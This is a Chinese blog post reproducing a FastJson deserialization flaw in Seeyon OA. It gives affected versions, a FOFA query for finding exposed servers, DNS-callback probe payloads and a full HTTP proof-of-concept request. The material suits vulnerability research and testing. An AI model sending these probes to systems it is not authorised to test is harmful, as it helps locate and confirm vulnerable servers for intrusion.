致远伪0day-FastJson利用链

2021-07-09 web安全漏洞复现字数统计: 527字阅读时长: 2分

0x01 影响范围

V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1

0x02 漏洞搜索

搜索语法

FOFA："seeyon" && after="2021-05-01"

0x03 漏洞检测

Jndi影响范围：
1、rmi的利用方式：适用jdk版本：JDK 6u132、JDK 7u122、JDK 8u113之前
2、ldap的利用方式：适用jdk版本：JDK 11.0.1、8u191、7u201、6u211之前

区分FastJson与Jackson：
1）不闭合花括号看报错信息方法
2）减少参数方法
{“name”:“S”, “age”:21}//Fastjson 是不会报错
{“name”:“S”, “age”:21,“xxx”:123}// Jackson 语法相对比较严格,会报错
3）fastjson报错关键词:

com.alibaba.fastjson.JSONException , 触发方式如下
{“x”:"
[“x”:1]
{“x”:{"@type":“java.lang.AutoCloseable”

DNS探测方法：
注意：Content-Type: application/json

# 未报错poc
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}

# 报错,但仍有效
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}

# 报错,且返回400,但仍有效
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}

0x04 漏洞复现

1.使用dnslog验证漏洞, 打开http://www.dnslog.cn获取域名

漏洞POC

POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

_json_params={"@type":"java.net.Inet4Address","val":"qn94mq.dnslog.cn"}

3.将上面的代码放到BurpSuite中，然后设置好对应的HOST和端口。

查看dnslog 成功回显, 说明存在漏洞

本文链接: https://ad-calcium.github.io/2021/07/%E8%87%B4%E8%BF%9C%E4%BC%AA0day-fastjson%E5%88%A9%E7%94%A8%E9%93%BE/

License: CC BY 4.0 CN

AD钙奶

Good Good Study, Day Day Up~